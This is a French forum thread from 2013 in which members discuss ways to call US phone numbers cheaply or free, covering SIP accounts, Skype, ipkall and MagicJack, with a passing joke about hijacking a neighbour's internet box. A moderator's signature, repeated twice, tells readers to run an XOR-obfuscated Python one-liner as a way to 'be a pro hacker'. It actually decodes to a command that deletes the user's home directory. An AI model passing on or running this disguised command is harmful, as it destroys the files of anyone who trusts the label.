Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 02-01-2013 09:48:03

yasmine
Membre Indispensable

J'ai besoin d'appeler aux USA gratuitement - une aide ?

Salut

Je cherche une solution simple et gratuite (bien entendu), pour appeler des N° de téléphones (fixes et mobiles) aux USA .

Je suis sous Ubuntu, et je ne dispose pas de carte de crédit.

J'ai trouvé  ceci, mais ca ne fonctionne pas chez moi les appeles téléphoniques (ca marche pour les SMS)

Merci

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 02-01-2013 11:01:46

spawn
Modérateur

Re : J'ai besoin d'appeler aux USA gratuitement - une aide ?

Bien.

Ce n'est pas possible dans le domaine de la légalité.
Si jamais tu tombes sur un site qui te propose ça moyennant un milliard de pubs et la vente de l'enregistrement de ta communication à des boîtes de pub, fais tourner, mais je doute fortement de son existence.

Je t'invite à te renseigner sur le système téléphonique mondial :
Public Switched Telephone Network sur wikipédia.
Et sur le fonctionnement du téléphone (français, celui-ci, mais il ne doit pas être bien différent en algérie)
Pdf sur les téléphones (en comic sans ms -_-)

Pour appeler aux USA, il te faut une ligne :
- Le PSTN est payant, c'est une grosse infrastructure.
- Je suppose que tu n'as pas de satellite à toi sous la main.
- Internet est payant, mais bien moins cher.

Je t'invite à te renseigner sur mumble pour les appels entre internautes.
Je crois que Skype (the evil bad microsoft skype) propose des appels pour vraiment pas cher. (Mais il te faut une carte bleue).

Tu peux aussi rooter une lolbox chez un brave internaute dont la téléphonie passe par internet avant de sortir chez son gentil FAI et passer par sa ligne téléphone pour appeler dans le monde. Mais c'est le mal.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#3 02-01-2013 15:04:50

antares145
Membre d'honneur
Site Web

yasmine a écrit :

J'ai besoin d'appeler aux USA gratuitement - une aide ?

Non. Tu as envie d'appeler les USA gratuitement, ou à la rigueur tu as besoin d'appeler les USA et tu as envie que ce soit gratuit. Nuance smile

Comme dit Spawn, il n'y a pas de miracle : les infrastructures ont un coût, généralement élevé (bien que pas toujours justifié), donc une solution 100% gratuite n'existe probablement pas. Ou si c'est gratuit, c'est que tu es le produit (affichage de pubs, enregistrement de ton numéro ou de celui du correspondant, enregistrement de la communication,...). Si ce genre de solution te convient grand bien te fasse (mais ne te plains pas quand tu te feras spammer sur ton tel), mais ce n'est pas du "gratuit" wink

Si on reste dans les options légales (donc pas de piratage de lolbox, même si j'aime l'idée smile), tu ne peux pas demander à ton correspondant d'utiliser Skype (ou Mumble, ou Ekiga si tu préfères des solutions alternatives) ? Là, effectivement c'est gratuit, mais tu ne peux pas passer d'appel vers le réseau téléphonique classique (sans payer, enfin).

La solution la moins chère est probablement de souscrire à un compte SIP qui te donnera un numéro de téléphone "américain" redirigé vers le net (ou un autre numéro de téléphone). Donc tu pourras appeler "en local" depuis chez toi, mais le payement de ce genre de service se fait souvent par carte de crédit hmm Tu as des essais gratuits si tu cherches un peu, sinon les tarifs (chez OVH par exemple) sont intéressants.
Tu peux aussi utiliser ipkall pour lier un numéro américain à un compte SIP
- tu crées un compte SIP gratuit (chez Ekiga par exemple, mais il y a plein de fournisseurs)
- tu crées un compte chez ipkall et tu rediriges un numéro américain vers ton compte SIP
- ton correspondant peut appeler ce numéro américain et tu reçois l'appel sur ton ordi. Mais le correspondant doit payer la communication "en local" (c'est peut-être inclus dans son forfait).

Il y a aussi moyen de bidouiller avec Google Voice, qui permet effectivement des appels gratuits vers les USA mais c'est borderline et un peu compliqué techniquement hmm
--> Google Voice hors des USA

Perso je trouve qu'il y a un moment où il faut renoncer au tout-gratuit : tu profites d'un service, ce service a un coût et c'est normal que tu paies pour, même si c'est minime. Quand je vois que chez OVH pour 1 euro par mois tu as un numéro français et les communications vers les fixes de 40 pays (dont les USA, 1 heure par appel max.), je me dis que c'est pas insurmontable. Bon, il reste le problème du paiement, mais tu ne peux pas t'arranger avec un ami qui dispose d'une carte de crédit ?

#4 03-01-2013 10:42:39

JeanCharles
Membre Indétronable
Lieu : Sainte-Anne

Le Phreak, c'est chic!
mojave_phreakon-300x240.jpg
Mais c'est moins chic chez les voisins aussi...

« γνωθι σεαυτον »

#5 10-01-2013 14:23:40

yasmine
Membre Indispensable

Je viens de tomber sur magicJack  (qu on peut installer l'application sur un Iphone)

#6 13-01-2013 15:20:19

koala
Membre d'honneur
Lieu : In the sky

Hihi, intéressant a savoir car je suis aussi a l'étranger mais je veux rester dans le légal, je vais voir si il y a un équivalent sous android.

#7 13-01-2013 17:07:14

spawn
Modérateur

Ce truc ne m'a pas l'air recommendable.

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#8 13-01-2013 17:29:03

antares145
Membre d'honneur
Site Web

spawn a écrit :

Ce truc ne m'a pas l'air recommendable.

+1, quand je lis "ripoff" (= arnaque) dans un résultat sur deux, ça ne m'inspire pas...

#9 13-01-2013 20:58:12

yasmine
Membre Indispensable

NON
pourquoi vous dites arnaque ? c est legal le site

J ai installé cette application sur mon android, et ca marche 100%

#10 13-01-2013 22:02:22

spawn
Modérateur

Je n'ai pas dit illégal, attention.
Ça m'a l'air d'être un truc sympa, ton appel sort au Canada via leurs serveurs.
Internet dit que c'est vraiment naze au niveau du service clientèle et du service après vente.

La seule utilisation que je pourrais en faire, c'est un outil pour téléphoner gratos depuis une VM android via leur application, dans laquelle je ne mettrais aucune information personnelle, encore moins de numéros de carte bleue.

Tu arrives à appeler aux US gratuitement ?

@9b0ae3c4 méric.fr

#11 14-01-2013 17:34:35

yasmine
Membre Indispensable

spawn a écrit :

Tu arrives à appeler aux US gratuitement ?

Oui biensur, j ai appelé (et j appelle toujours) USA et Canada , fixes et mobiles, gratuitement autant que je veux, et sans publicité, coupure, ...

Je suis en Tunisie, et j appelle avec ce MagicJack (sous android), comme si je suis aux USA (je compose le N° directement SANS le prefixe international (00.....)

Dernière modification par yasmine (14-01-2013 17:39:25)

#12 15-01-2013 01:18:06

jlf
Membre Indétronable

question betr dans ton acces internet les usa en font pas partie des appelle illimite car j ai pu appeller ll allemagne sans surplus c est compris dans l acces internet que tout le mode possede bouyg c est vers 100 destination les uatre je sais pas

#13 15-01-2013 01:20:34

jlf
Membre Indétronable

http://www.free.fr/adsl/telephone.html exemple pour freebox apelle ton fournisseur d acces au net pour savoir

#14 15-01-2013 06:56:32

yasmine
Membre Indispensable

jlf a écrit :

question betr dans ton acces internet les usa en font pas partie des appelle illimite car j ai pu appeller ll allemagne sans surplus c est compris dans l acces internet que tout le mode possede bouyg c est vers 100 destination les uatre je sais pas

Je n ai aucun appel international (meme les N° verts, ..) gratuit avec mon founisseur ou n importe quel autre fournisseur, ....

#15 15-01-2013 19:57:01

M1ck3y
Administrateur
Lieu : Lost in the darkness

Les membres du forum ne résident pas forcément en France jlf, il y a des personnes francophones partout dans le monde.

Annonce